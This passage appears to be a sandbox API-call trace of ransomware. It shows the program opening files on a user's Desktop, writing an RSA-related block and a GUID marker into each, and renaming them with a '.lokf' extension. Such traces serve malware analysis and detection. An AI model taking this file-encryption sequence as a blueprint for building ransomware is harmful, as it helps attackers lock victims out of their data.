KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.493] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.494] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.494] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.494] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.494] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.494] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.494] GetLastError () returned 0x0 [0058.494] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.494] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.494] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.494] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.494] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.494] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.495] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.495] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.495] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15f2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.495] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.496] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.496] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.496] CloseHandle (hObject=0x5cc) returned 1 [0058.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.497] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Md r.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9md r.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Md r.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9md r.swf.lokf")) returned 1 [0058.498] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74880ca0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0x172abcb0, ftLastAccessTime.dwHighDateTime=0x1d4d39d, ftLastWriteTime.dwLowDateTime=0x172abcb0, ftLastWriteTime.dwHighDateTime=0x1d4d39d, nFileSizeHigh=0x0, nFileSizeLow=0x1233d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9REu6C.m4a", cAlternateFileName="")) returned 1 [0058.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.498] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.498] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9REu6C.m4a") returned=".m4a" [0058.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9REu6C.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9reu6c.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.498] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=74557) returned 1 [0058.498] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.500] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12317, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.500] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.500] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.501] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1233d, lpOverlapped=0x0) returned 1 [0058.501] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.501] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.501] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.501] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.501] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.502] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.502] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.502] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.502] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.502] GetLastError () returned 0x0 [0058.502] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.502] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.502] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.502] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.502] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.502] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.502] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.503] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1233d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.503] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.503] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.503] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.503] CloseHandle (hObject=0x5cc) returned 1 [0058.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.504] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.504] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9REu6C.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9reu6c.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9REu6C.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9reu6c.m4a.lokf")) returned 1 [0058.505] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x384de1e0, ftCreationTime.dwHighDateTime=0x1d4cad5, ftLastAccessTime.dwLowDateTime=0x98131ff0, ftLastAccessTime.dwHighDateTime=0x1d4c576, ftLastWriteTime.dwLowDateTime=0x98131ff0, ftLastWriteTime.dwHighDateTime=0x1d4c576, nFileSizeHigh=0x0, nFileSizeLow=0x68be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aRT3ou.jpg", cAlternateFileName="")) returned 1 [0058.505] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.505] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.505] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRT3ou.jpg") returned=".jpg" [0058.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRT3ou.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\art3ou.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.505] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=26814) returned 1 [0058.505] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.507] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6898, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.507] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.508] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.508] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x68be, lpOverlapped=0x0) returned 1 [0058.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.508] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.508] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.508] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.509] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.509] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.509] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.509] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.509] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.509] GetLastError () returned 0x0 [0058.509] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.509] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.509] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.509] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.509] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.509] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.510] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.510] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.510] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x68be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.510] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.510] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.510] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.510] CloseHandle (hObject=0x5cc) returned 1 [0058.517] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.517] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.517] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRT3ou.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\art3ou.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aRT3ou.jpg.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\art3ou.jpg.lokf")) returned 1 [0058.518] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b11c220, ftCreationTime.dwHighDateTime=0x1d4d570, ftLastAccessTime.dwLowDateTime=0xa72b1130, ftLastAccessTime.dwHighDateTime=0x1d4c65e, ftLastWriteTime.dwLowDateTime=0xa72b1130, ftLastWriteTime.dwHighDateTime=0x1d4c65e, nFileSizeHigh=0x0, nFileSizeLow=0xf7db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bSgKDO2SM-AQU.mp3", cAlternateFileName="BSGKDO~1.MP3")) returned 1 [0058.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.518] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.518] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bSgKDO2SM-AQU.mp3") returned=".mp3" [0058.518] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bSgKDO2SM-AQU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsgkdo2sm-aqu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.519] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=63451) returned 1 [0058.519] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.520] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf7b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.520] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.521] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xf7db, lpOverlapped=0x0) returned 1 [0058.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.521] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.521] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.522] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.522] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.522] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.522] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.522] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.522] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.522] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.522] GetLastError () returned 0x0 [0058.522] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.522] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.522] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.522] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.523] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: 